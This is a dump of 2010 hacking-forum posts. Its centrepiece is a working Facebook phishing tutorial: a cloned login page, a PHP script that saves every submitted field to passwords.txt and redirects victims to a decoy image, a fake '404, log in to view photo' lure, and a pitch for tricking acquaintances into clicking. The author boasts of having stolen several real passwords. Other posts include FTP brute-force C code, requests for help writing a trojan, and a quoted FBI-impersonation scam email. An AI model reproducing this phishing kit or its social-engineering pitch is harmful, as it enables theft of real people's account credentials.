EliteHackers.info Discussion Forums

Phishing Facebook

havok21 — Mon, 06 Sep 2010 20:57:26 GMT

I was up all night studying tutorials, tweaking scripts, learning a bit of a few different languages. The method i have came up
with worked for me, i already have 4 different facebook passwords/emails. And sorry in advanced for the sloppy mini tutorial itll be 24 hours with no sleep in 3 hours. So i am a little burnt! THANKS

POST: You only actually have to deal with one file. That is the CSS Template disguised as an image file!!

First you are going to need a free domain that lets you use php! I used 2 different sites. The first site was www.fileave.com, which i used for uploading pictures to. The name fileave kind of stands out! You will see what I mean. The second site was www.ripway.com, I used this site for all my php forms and scripts.

Go head and sign up for ripbay.com first. Now when you have successfully joined and logged in, goto "myfiles" in the top center. You will click on "create text file." Name this file login.php
You will make another the same way but name this one phish.php You have a total of 2 files so far.
Lets goto facebook login,facebook.com not 'facebook.com/login.php?' and get the pages source. Copy the source and go back to ripway.com, paste this code into the login.php
You are going to need to make a small modifacation to the file. click on the text and then goto edit, then find. The short cut for this function is Ctrl+f. Type in "action=" into the find input field.
You should see this lil piece of code:

Code:

You want to look like this:

Code:





 Now take the Tweaked login page and save it as login.php with thee above changes

ONTO THE NEXT PART:
Now copy and paste this php script into your phish.php

Code:


//This piece of code below me is a header, it redirects your browser.

header ("Location: http://AmBoxer21.fileave.com/img_0022.jpg");

/*That handle in this code is used for taking your facebook username/email and sending it to a file that it makes, called "password.txt." that little "a" arguement allows for r+w*/

$handle = fopen("passwords.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle) ;

exit;

?>

Now that php header redirects them to the image at fileave.com after they login our fake FB page! It does so immediately. So it looks legit!
The CCS Temp...You can google css and html or just use my code. But after this css page is finished, you are gonna name it IMG0123.php or what ever you want. "The bottom explains"
The file states: 404 ERROR!
Sorry but you need to be logged in to view this file!
Click here to login to Facebook.com and view this photo! I took an image of a black and white firefox icon and centered it to make it look some what legit! i had the click here to log in to facebook anchored with html to be redirected to my phishing page(fake login page).

CSS CODE: This is the link that you will give the target. It will then redirect you to our fake login page, then it will goto the photo. No "You have been phished warning" and prompt for changing password!!

Code:



   

      <br />
      404 ERROR!<br />
      

404 ERROR!


      



   

   


echo "Sorry but you need to be logged in to view this file!";

?>










Click here to login to Facebook.com and view this photo!

Now the pitch:

You cannot send this over facebook and i am almost certain AOL will not lent you send or recieve this file for some reason. But what I did was get peoples email and pitch them a story about how this person was aparently talking shit about them blah blah blah. and urged them not to do anything please! and pasted the Direct Link: http://h1.ripway.com/amboxer21/IMG00123.php i of course knew these people lol so it wasnt hard! now the reason i did the picture scenario was because when I redirected the browser to the wrong username/email page it would display a message that you have been phished. So this is my alternative around it! You can tweak it to send you somewhere else or set a different pic idk whatever you want!

Trojan help

havok21 — Mon, 06 Sep 2010 20:37:30 GMT

OK I wanna write my own trojan. I dont want someone elses script because then there is no joy in being able to say I did it. Programming is fun anyway! So the real question is what is a trojan made up of?? this way I can google or research the right literature and topics! From my understanding, it is a listening socket... I think lol How is it packaged and deployed? Blah Blah Blah, and all that good stuff.
But as soon as I learn, I will be sure to give back what I have accomplished and help other achieve the same!

Thanks in advance!!

Phishing php script help

havok21 — Sun, 05 Sep 2010 23:13:32 GMT

i set up a phishing system for facebook, and the php script i tweaked reads an error when redirecting the user. it says "security warning, this is not a facebook page. you should change your password" Any help would be appriciated!!!
!!Thanks in advance!!

Code:


header ("Location: https://login.facebook.com/login.php?login_attempt=1");

$handle = fopen("passwords.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle) ;

exit;

?>

------Automerged Doublepost------
Well thank you for the help anyway! But i have figured out the problem on my own. Much appreciated for even the views of my post! i spent all night working on the facebook phishing and hooked everything up and i already got 5 people lol kind of funny to see their passwords and login names sent directly to you! brought a big smile to my face! Completely worth the all nighter!!

But if anyone wants to know how it's done, just message me or reply to this.

Best first language?

havok21 — Fri, 03 Sep 2010 19:48:29 GMT

Which language would be better to learn as my first language, Python or C?
i am learning C now but it is rather lengthy and a little complicated!! i have heard that Python is easier to learn, takes a 5th of time and code than C does and all around a more powerfull language to work with! even has GUI capabilities as C does not have this function. Any suggestions from experienced programmers??

C Login FTP

xacks — Fri, 03 Sep 2010 13:54:55 GMT

Code:

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 



struct cracker {

        char host[256];

        char peticiones[1024];

}cracker;

struct attack {

        char host[256];

        char peticion1[256];

        char peticion2[256];

}attack;

int main (int argc, char *argv[]){

        struct hostent *ad;

        struct sockaddr_in serv;

        int s1;

        char buffer[8000];

        int bytes_read;

        bzero(&(attack),3);

        bzero(&(cracker),2);

        if (argc < 3 ) {

        printf("%s  \n" , argv[0]);

        exit(0);}



        if (sizeof(argv[1])>=256) exit(0);

        memcpy(attack.host , argv[1] , sizeof(argv[1]));



        ad=gethostbyname(argv[1]);

        if (ad == NULL ) {

        printf ("[-]error gethostbyname\n");

        exit(-1);

        }

        s1 = socket(AF_INET, SOCK_STREAM , 0);

        if (s1 == -1){

        printf ("[-]error al abrir el socket\n");



        }

        serv.sin_family=AF_INET;

        serv.sin_port=htons(21);

        serv.sin_addr= *((struct in_addr *) ad->h_addr);

        bzero(&(serv.sin_zero),8);

        if (connect(s1, (struct sockaddr*)&serv,sizeof(struct sockaddr))==-1)

        printf ("error : conecting \n");

        printf ("[+]Conectando ... \n\n");

        memcpy(cracker.host , "Host: " , 6);

(cracker.host + 6 , attack.host , strlen(attack.host));

(cracker.host + strlen(cracker.host), "\r\n",2);

        printf("[+] FTP Brute Force in process\n");

        memcpy(attack.peticion1 , "USER xacks-security.es" , 21);

printf ("Probando usuarios... \n");

send (s1, attack.peticion1 , sizeof(attack.peticion1),0); 



printf ("Probando contrase�as...\n");

memcpy(attack.peticion2 , "PASS asd" , strlen(attack.peticion2));

send (s1, attack.peticion2 , sizeof(attack.peticion2),0);

send (s1, "\r\n\r\n" , 4,0);

do

    {

        bzero(buffer, sizeof(buffer));

        bytes_read = recv(s1, buffer, sizeof(buffer), 0);

        if ( bytes_read > 0 )

            printf("They say : %s", buffer);

    }

    while ( bytes_read > 0 );

    close(s1);

    return 0;}

What happened?
This program no login to server ftp :(
and i not know why ?

C function help for begginer

havok21 — Fri, 03 Sep 2010 03:24:18 GMT

hey im just starting to learn C, i am a month or so into learning. i am currently learning about functions and im stuck on a problem. heres the code

Code:

#include 

#include 



void func1(void);

void func2(void);

void func3(void);



int how;

void main(void)

   {

   printf("This is my first function");

   func1();

   func2();

   }



void func1(void)

{

   printf(" How did i do? ");

   scanf("%d", &how);

}



vvoid func2(void)

{

int good, excellent;



if(how == good, excellent)

    {

    printf("Thank you!");

    }

else func3();

}

void func3(void) /*I ADDED FUNC3 SCRAPHEAP.*/

{

    printf("Sorry i will try harder next time!");

}

i cant get it to print "Sorry, ill try better next time" if good or excellent are not used. help please.
thanks in advanced!

Time spent.

Fluf — Thu, 02 Sep 2010 20:49:45 GMT

I just calculated that i have spent 15k+ hours behind computer and i'm only 20, isn't that awesome ?

Favorite Application or Software

Adamant — Thu, 02 Sep 2010 19:49:04 GMT

We should have a Thread where we can each select the top 3 Programs we like and why we like them.

This way we can Learn from each others experiences and see what it is other people are using,

So I made this Thread,

Here's my Top 3:

1--->ESET NOD 32 Anti-Virus 4.0.468.0

REASON:If You don't Know Find out ^^ NOW with smart Security

2--->EASEUS Data Recovery Wizard Professional 4.3.6 (Retail) [RH]

REASON:Recovers drives, Partitions, and simply deleted files, Giving you the choice of what you want to recover

3--->SafeLock

Reason:Encrypts, Hides, and Shreds Files, Very small, 5mb with online function

************************************************** ********************************************
Hopefully You Will all make some post so That I can Reap your software from some poor site mauhahahaha!

I am Adamant

EH Chat Help

Adamant — Thu, 02 Sep 2010 19:18:33 GMT

I'm Having Some Trouble trying to connect To Chat

Here,s what Keeps Popping Up When I press Connect:

Code:

Connecting... 

Unable to connect : java.net.ConnectException : Connection timed out: connect 

Connecting... 

Unable to connect to irc.easynews.com : currently trying to connect to irc.easynews.com 

Unable to connect : java.net.ConnectException : Connection timed out: connect

I'm Running Updated JAVA so I shouldn't be Getting This, Any Suggestions?

I am Adamant

Great Encryptors???

Adamant — Thu, 02 Sep 2010 17:35:24 GMT

I was Looking For some software that's reliable at Encrypting with at least a 254 bit Encryption, An6y names of software would be appreciated whether it needs to be Bought or not.

At the Current moment I'm using Safelock which I think is now Known as
Super Encryptor.

Its also allows you to Shred Files without them being able to be recovered at a later time.

However even though that's alright the software seems too weak an Encryptor.

I am Adamant

Brute Force Attack Method

lkjoel — Thu, 02 Sep 2010 02:21:06 GMT

I am trying to figure out how to make a Brute Force Attack on URLs.
I would appreciate any Methods, PSEUDO code, code or any other kind of help
Thanks in advance!

hacker help

havok21 — Tue, 31 Aug 2010 19:13:31 GMT

Hey, I think being a script kiddie is something that i "DO NOT" want to be!! so instead of people telling me to download this and have them point me to their web sites to so that i may download some crazy bullshit, or even beg people for scripts...Crazy man!! I think it looks and is pathetic! so i want to cut all the bullshit out! so a month ago i decided to teach myself C/C++ and i am going to move on to python next. any pointers because in the future i would love to learn how to write my own buffer overflows!! or write my own trojans!!! but nothing malicous!! just to know i hacked something! so i guess the whole point of this is what should i be doing? am i on the right path?? learning to program and all... whats after that?? i have no problem learning or sitting @ the computer from sun down to sun up or with a book in my face all day! so a little guidance will help a lot and save me time! im not asking for scripts or tools, i want to know what i should learn!! i have to computers one with opensolaris and the other ubuntu, no windows!

london

1100 — Tue, 31 Aug 2010 11:46:01 GMT

Off to London for the week. See you homies later 8-)

Spam as if from FBI...?

A. I. — Tue, 31 Aug 2010 00:43:59 GMT

WTF is this new type of spam thats appeared as if from FBI? Looks like a scam someone is faking to get $300 bucks... and I guess they offering 1.5 million in return? LOL

ATTORNEY GENERAL OFFICE ACKNOWLEDGE MY EMAIL.AND GET BACK TO ME IN THE NEXT 24 HOUR

--Forwarded Message Attachment--

ANTI-TERRORIST AND MONITORY CRIMES DIVISION
FBI HEADQUARTERS IN WASHINGTON, D.C.
FEDERAL BUREAU OF INVESTIGATION
J.. EDGAR HOOVER BUILDING
935 PENNSYLVANIA AVENUE, NW WASHINGTON, D.C. 20535-0001

Attn:

Funds, you are to contact the ATTORNEY GENERAL OFFICE BELOW, Washington, DC to obtain the above required document, find below their contact information's:

Contact Person: Eric H. Holder, Jr
ATTORNEY GENERAL
Eric H. Holder, Jr : - Email address removed from bots quote post to view -
Address: 601 4th Street Washington, DC 20535
Phone number: 206 259 6321

Ensure you contact them ATTORNEY GENERAL with your Full Name,Address and phone number/cell number via email.

Contact the ATTORNEY GENERAL via Email with the information above immediately,once you contact them i will get back to you they will inform us or else i will have an agent come visit you at home for questioning and disobeying the law.
Furthermore, be advice that according to the United State Law together with the FBI rules and regulations, you are to obtain the document from the ATTORNEY GENERAL OF Washington, DC where the fund was transfer from. Also Note that you are to take care of the cost of the Document, which will be issued in your name. due to the content of the document and how important and secured the document is, you as the beneficiary will send to the ATTORNEY GENERAL OFFICEOF Washington, DC the sum of Usd300 Dollars only for the issuing of the document right away and your Usd1.5 million will be release to you, That is the lay down rules for ANTI CRIME DEPARTMENT to release such sensitive document, ATTORNEY GENERAL OFFICE will issue you the authentic and original copy of the documents with seal on it for verification and approval.
NOTE: We have asked for the above document to made available the most complete and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.You are to send and email to Sir Eric Holder and ask for the instructions on how to send the required $300 dollars for your CLEARANCE DOCUMENTS in order for you to clear your name and receive your funds immediately.
WARNING:failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed....... As terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. FORWARD THE DOCUMENT TO US VIA EMAIL ATTACHMENT AS SOON AS YOU OBTAIN IT from Sir Eric Holder . No body is above the law and the law is not a respecter of anybody. We presumed you are law abiding citizen whom would not want have scuffles with the authority, in and outside America.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don't dare dispute our instruction, just act as instructed.The person you know will not help you in this matter rather abide by this instruction. the funds in question was deposited by those people that contacted you.
Note: You are to contact them (ATTORNEY GENERAL OFFICE)with your full names,phone number/cell number and full address via their email which i stated above immediately for the processing of your Clearance Documents within the next 24 hours.
Faithfully Your's
Robert S.Mueller 111
FBI Director

Note contact the ATTORNEY GENERAL OFFICE office: - Email address removed from bots quote post to view - via email you have less than 24hours to contact them and ask them how you are to acquire the CLEARANCE
DOCUMENTS and make sure you send the required $300 dollars to them for the processing of paperwork in order for us to receive a copy of it to show you have been cleared.

can i reverse this? [vb.net]

dat hacker — Mon, 30 Aug 2010 23:12:05 GMT

i was trying to make well... pretty much an encryption method and one of the steps splits and combines both halves of the file...anyways is it possible for me to decrypt through this step?
--
Source:BTS-C
Executable:BTS-C.exe
in attachments

Attached Files

BHA.zip (4.0 KB)